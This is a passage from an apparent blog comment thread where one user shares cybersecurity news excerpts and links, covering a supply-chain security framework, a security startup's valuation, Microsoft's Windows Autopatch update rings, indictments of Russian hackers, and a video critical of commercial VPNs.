It’s a security framework, a check-list of standards and controls to prevent tampering, improve integrity, and secure packages and infrastructure in your projects, businesses or enterprises. It’s how you get from safe enough to being as resilient as possible, at any link in the chain.
Tomi Engdahl says:
A cybersecurity CEO saw a 3000% increase in his company’s valuation to $1.4 billion in a year. Though even he calls it ‘inflated,’ he says VCs are still hounding him.
https://www.businessinsider.com/cybersecurity-startup-unicorn-status-coatue-investment-2022-4?utm_source=copy-link&utm_medium=referral&utm_content=topbar&r=US&IR=T
Panther Labs’ 31-year-old founder and CEO, Jack Naglieri, found himself in the enviable position of being hounded by prospective investors last year, even as he politely rebuffed them.
“I wasn’t ready yet,” Naglieri said. “We had just raised our Series A less than six months prior. Things were still fairly early, and I wanted to wait for the business to grow a little bit more.”
Tomi Engdahl says:
Windows Autopatch Aims to Make Patch Tuesday ‘Just Another Tuesday’ for Enterprises
https://www.securityweek.com/windows-autopatch-aims-make-patch-tuesday-just-another-tuesday-enterprises
Microsoft this week announced Windows Autopatch, a new automatic updates service for Windows 10 and 11 Enterprise E3 customers that will manage all software, firmware, driver, and enterprise app updates.
The new feature ensures that Windows and Office products on enrolled endpoints are automatically updated, at no additional cost, helping admins more easily manage the security updates rolled out on the second Tuesday of every month.
“The second Tuesday of every month will be ‘just another Tuesday’,” said Microsoft’s Lior Bela.
Windows Autopatch rolls out updates gradually, to evaluate the deployment and ensure that no issues arise. Thus, all registered devices should be kept updated without disrupting business operations.
“The development of Autopatch is a response to the evolving nature of technology. Changes like the pandemic-driven demand for increased remote or hybrid work represent particularly noteworthy moments but are nonetheless part of a cycle without a beginning or end,” Microsoft notes.
Autopatch, Microsoft says, will eliminate security gaps by delivering important updates in a timely manner, providing enterprises with timely response to changes.
According to Microsoft, Windows Autopatch can detect variations among endpoints to dynamically create 4 testing “rings,” which are groups of devices representative of the diversity within the enterprise environment.
These rings include the ‘test’ ring, containing a minimum number of representative devices, the ‘first’ ring, which contains roughly 1% of the managed devices, the ‘fast’ ring, containing roughly 9% of devices, and the ‘broad’ ring, which contains the remaining 90% of endpoints.
“The population of these rings is managed automatically, so as devices come and go, the rings maintain their representative samples. Since every organization is unique, though, the ability to move specific devices from one ring to another is retained by enterprise IT admins,” Microsoft notes.
Get current and stay current with Windows Autopatch
https://techcommunity.microsoft.com/t5/windows-it-pro-blog/get-current-and-stay-current-with-windows-autopatch/ba-p/3271839
As IT departments are being asked to do more with less, Microsoft is pleased to introduce[1] Windows Autopatch as a feature of Windows Enterprise E3[2], enabling IT pros to do more for less. This service will keep Windows and Office software on enrolled endpoints up-to-date automatically, at no additional cost. IT admins can gain time and resources to drive value. The second Tuesday of every month will be ‘just another Tuesday’.
Tomi Engdahl says:
https://portswigger.net/daily-swig/hacker-community-jumps-on-hilarious-twitter-meme-mocking-bad-infosec-advice-from-cisos
Tomi Engdahl says:
Feds Allege Destructive Russian Hackers Targeted US Refineries
The Justice Department unsealed indictments against four alleged Russian hackers said to have targeted US energy infrastructure for nearly a decade.
https://www.wired.com/story/triton-berserk-bear-russian-hackers-doj-indictment/
Tomi Engdahl says:
Why VPNs are a WASTE of Your Money (usually…)
https://www.youtube.com/watch?v=9_b8Z2kAFyY
Commercial VPNs probably hurt your privacy and security more than they help. Behind the layers of marketing sits a darker side of the industry. Ask yourself questions like:
- Why trust a VPN company and their ISP over my own?
- Who’s actually running these companies?
- Why so many VPN ads on YouTube?
- What’s up with all the review sites?